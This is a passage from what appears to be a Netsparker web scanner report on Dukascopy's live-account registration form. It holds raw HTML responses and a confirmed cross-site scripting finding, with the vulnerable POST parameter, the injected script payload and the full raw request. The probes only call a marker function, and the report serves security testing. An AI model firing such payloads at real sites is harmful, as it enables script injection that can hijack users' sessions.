&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00013B)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BTYPE%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000152)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 265
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000152)%3c%2fscript%3e&amp;aData%5BaccountKind%5D=3&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
